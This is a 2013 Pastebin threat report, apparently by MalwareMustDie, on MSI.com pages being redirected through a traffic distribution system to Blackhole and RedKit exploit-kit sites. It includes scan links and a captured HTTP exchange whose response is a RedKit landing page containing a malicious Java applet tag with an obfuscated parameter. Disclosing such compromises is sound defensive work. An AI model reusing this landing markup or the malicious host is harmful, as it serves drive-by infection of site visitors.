daily pastebin goal
22%
SHARE
TWEET

*.MSI.COM got hacked, redirected to TDS to EK

MalwareMustDie Jul 15th, 2013 219 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // *MSI.COM site got redirected by TDS,
  2. // IN one ocassion to Blackhole sites
  3. // Just checked it changed to RedKit Sites,
  4.  
  5. // Note PoC of this case:
  6. http://urlquery.net/report.php?id=3764213
  7. http://urlquery.net/report.php?id=3763965
  8. http://urlquery.net/report.php?id=3764205
  9.  
  10. // Below RedKit PoC of the redirected URL:
  11. //  h00p://kristians1.net/blog/?p=5613
  12.  
  13. GET /blog/?p=5613 HTTP/1.1
  14. Host: kristians1.net
  15. User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
  16. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  17. Accept-Language: en-us,en;q=0.5
  18. Accept-Encoding: gzip, deflate
  19. Connection: keep-alive
  20. Referer: http://fr.msi.com/
  21.  
  22.  
  23.  
  24. HTTP/1.1 200 OK
  25. Date: Mon, 15 Jul 2013 17:56:47 GMT
  26. Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 PHP/4.4.9 mod_fcgid/2.3.5
  27. X-Curl-Errno: 0
  28. Expires: Mon, 26 Jul 1997 05:00:00 GMT
  29. Cache-Control: no-cache
  30. Pragma: no-cache
  31. Content-Length: 173
  32. Connection: close
  33. Content-Type: text/html
  34.  
  35.  
  36. <html><body><table>LOLOLO<applet><param name="jnlp_href" value="yde.xmp" /><param name="size" value="ur=ax=hmayzmjxkce0mdehczha&7&.y"></param></applet></table></body></html>
  37.  
  38. ---
  39. #MalwareMustDie!
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top